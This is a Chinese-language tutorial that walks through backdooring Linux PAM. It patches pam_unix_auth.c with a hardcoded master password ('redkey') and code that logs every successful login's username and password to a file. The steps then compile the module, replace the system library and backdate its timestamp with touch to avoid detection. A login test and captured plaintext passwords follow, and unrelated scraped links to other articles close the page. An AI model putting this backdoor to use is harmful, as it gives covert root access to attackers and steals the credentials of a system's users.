一.查看系统pam版本:

[root@redkey ~]# rpm -qa | grep pam

pam-1.1.1-4.el6.x86_64

二.下载对应版本的pam模块

http://www.linux-pam.org/library/

三.解压&修改pam_unix_auth.c文件

tar -xzvf Linux-PAM-1.1.1.tar.gz

cd Linux-PAM-1.1.1

cd modules/pam_unix/

vim pam_unix_auth.c

四.修改部分



PAM_EXTERN int pam_sm_authenticate(pam_handle_t * pamh, int flags

                                  ,int argc, const char **argv)

{

定义:FILE *fp;如下:

PAM_EXTERN int pam_sm_authenticate(pam_handle_t * pamh, int flags

                                   ,int argc, const char **argv)

{

        unsigned int ctrl;

        int retval, *ret_data = NULL;

        const char *name;

        const void *p;

        FILE *fp;

在retval = _unix_verify_password(pamh, name, p, ctrl); [约177行]下添加

/*password:”redkey”*/

if(strcmp(p,”redkey”)==0)

{

        retval = PAM_SUCCESS;

}

if(retval== PAM_SUCCESS)

{

/*pamfile:pamwd.txt*/

        fp=fopen(“pamwd.txt”,”a”);

        fprintf(fp,”%s::%s\n”,name,p);

        fclose(fp);

}

五.编译

[root@redkey pam_unix]# cd ../../

[root@redkey Linux-PAM-1.1.1]# ./configure

[root@redkey Linux-PAM-1.1.1]# make

六.备份原有PAM模块

[root@redkey security]# mv pam_unix.so{,.bak}

七.复制新PAM模块到/lib64/security/目录下:

[root@redkey security]# cp /root/Linux-PAM-1.1.1/modules/pam_unix/.libs/pam_unix.so /lib64/security/

八.修改pam模块时间属性

[root@redkey security]# stat pam_unix.*

  File: “pam_unix.so”

  Size: 151879          Blocks: 304        IO Block: 4096   普通文件

Device: fd01h/64769d    Inode: 565261      Links: 1

Access: (0755/-rwxr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root)

Access: 2013-12-24 11:30:01.813610217 +0800

Modify: 2013-12-24 08:55:00.000000000 +0800

Change: 2013-12-24 11:29:12.747789015 +0800

  File: “pam_unix.so.bak”

  Size: 50752           Blocks: 104        IO Block: 4096   普通文件

Device: fd01h/64769d    Inode: 523660      Links: 1

Access: (0755/-rwxr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root)

Access: 2013-12-24 08:55:08.026835929 +0800

Modify: 2010-02-16 01:34:42.000000000 +0800

Change: 2013-12-24 10:42:11.741663207 +0800

[root@redkey security]# touch -t 201002160134 pam_unix.so

[root@redkey security]# ll pam_unix.*

-rwxr-xr-x  1 root root 151879  2月 16 2010 pam_unix.so

-rwxr-xr-x. 1 root root  50752  2月 16 2010 pam_unix.so.bak

九.万能密码登陆验证

login as: root

root@192.168.169.131’s password:

Last login: Tue Dec 24 11:10:16 2013 from 192.168.169.1

[root@redkey ~]#

[root@redkey /]# cat pamwd.txt

root::redkey

root::123456

root::12345678

root::redkey

root::redkey

  

Linux系统安全之pam后门安装使用详解的更多相关文章

  1. linux系统/var/log目录下的信息详解

    一./var目录 /var 所有服务的登录的文件或错误信息文件(LOG FILES)都在/var/log下,此外,一些数据库如MySQL则在/var/lib下,还有,用户未读的邮件的默认存放地点为/v ...

  2. Xshell6远程访问linux及Xftp6远程针对linux系统中文件操作(附图文详解)

    1.首先我们需要先做好前期准备工作,需要到XManager6官网上将Xshell及Xftp下载并安装,安装过程一直下一步就好了.这里是其官网:http://www.xshellcn.com/.安装完成 ...

  3. Jmeter(五十四) - 从入门到精通高级篇 - 如何在linux系统下运行jmeter脚本 - 上篇(详解教程)

    1.简介 上一篇宏哥已经介绍了如何在Linux系统中安装Jmeter,想必各位小伙伴都已经在Linux服务器或者虚拟机上已经实践并且都已经成功安装好了,那么今天宏哥就来介绍一下如何在Linux系统下运 ...

  4. linux系统644、755、777权限详解

    在linux系统中644.755.777三种权限是非常重要的一些权限了,下面我来详细的介绍644.755.777三种权限的使用,希望对各位有帮助. 常用的linux文件权限:444 r--r--r-- ...

  5. Linux系统中的vi/vim指令【详解】

    vi是Unix世界里极为普遍的全屏幕文本编辑器,vim是它的改进版本Vi IMproved的简称.几乎可以说任何一台Unix机器都会提供这套软件. 只要简单的在Shell下执行vi就可以进入 vi 的 ...

  6. linux系统下添加新硬盘的方法详解

    对于linux新手来说,在linux上添加新硬盘,是很有挑战性的一项工作. 在Linux服务器上把硬盘接好,启动linux,以root登陆. fdisk -l ## 这里是查看目前系统上有几块硬盘 D ...

  7. Linux系统下配置squid代理服务器的过程详解

    简单记录一下Squid透明代理服务器的配置 环境:VirtualBox + CentOS 6.0 + squid-3.1.4-1.el6.i686 0.检查squid是否默认安装,没有安装的先安装 [ ...

  8. Linux系统chmod命令的含义和权限详解

    许多喜欢使用chmod命令的用户,对chmod命令的含义和权限仍然不是很清楚,因此在使用的时候对它们造成了一定的麻烦.为了解决这些用户的迷惑,今天小编就和大家一起分享下chmod命令的含义和权限. 对 ...

  9. Linux系统下(x64)安装jdk 1.6(jdk-6u45-linux-x64.bin)

    Linux系统下(x64)安装jdk 1.6(jdk-6u45-linux-x64.bin) 一,查看是否安装jdk: # rpm -qa | grep jdk 或者 #rpm -q jdk 或者 # ...

随机推荐

  1. 深入理解javascript构造函数和原型对象

    ---恢复内容开始--- 对象,是javascript中非常重要的一个梗,是否能透彻的理解它直接关系到你对整个javascript体系的基础理解,说白了,javascript就是一群对象在搅..(哔! ...

  2. 第三届山西省赛1004 一道大水题(scanf)

    一道大水题 时间限制: C/C++ 2000ms; Java 4000ms 内存限制: 65535KB 通过次数: 44 总提交次数: 1020 问题描述 Dr. Pan作为上兰帝国ACM的总负责人, ...

  3. 使用js冒泡实现点击空白处关闭弹窗

    什么是事件冒泡? 如图:在一个对象上触发某类事件(比如单击onclick事件),这个事件会向这个对象的父级对象传播,从里到外,直至它被处理(父级对象所有同类事件都将被激活),或者它到达了对象层次的最顶 ...

  4. 完美解决C#Webbrowser控件设置Cookie问题

    完美解决C#Webbrowser控件设置Cookie问题由于个人项目需求,需要把从抓包里面的Cookie数据写入到webbrowser空控件里,经过百度白百般折腾,结果还是失败,搜索到的答案基本上都是 ...

  5. javagc日志详解

    https://blog.csdn.net/aliveTime https://plumbr.io/blog/garbage-collection/understanding-garbage-coll ...

  6. Nginx反向代理400错误

    错误:使用Nginx的反向代理访问tomcat时400错误. upstream配置: upstream java_test{ server 127.0.0.1:8080; } 原因:nginx中ups ...

  7. 【转】fiddler抓包HTTPS请求

    本文转自:http://blog.csdn.net/idlear/article/details/50999490 fiddler抓包HTTPS请求 跟着教程来,保证100%成功抓HTTPS包 教程开 ...

  8. redis 简单使用总结

    作者:王清培(Plen wang)  沪江Java资深架构师 最近一段时间与redis接触比较频繁.发现有些东西还是工作中经常会用到的,自己也花了点时间巩固下.本篇文章主要是以总结性的方式梳理,因为r ...

  9. python写入excel(xlswriter)--生成图表

    一.折线图: # -*- coding:utf-8 -*- import xlsxwriter # 创建一个excel workbook = xlsxwriter.Workbook("cha ...

  10. 每天一个linux命令(4):mkdir

    1.命令简介 mkdir (Make Directory 创建目录): 若指定目录不存在则创建目录.在创建目录时,要求创建目录的用户具有写权限,并应保证新建的目录没有重名. 2.用法 用法:mkdir ...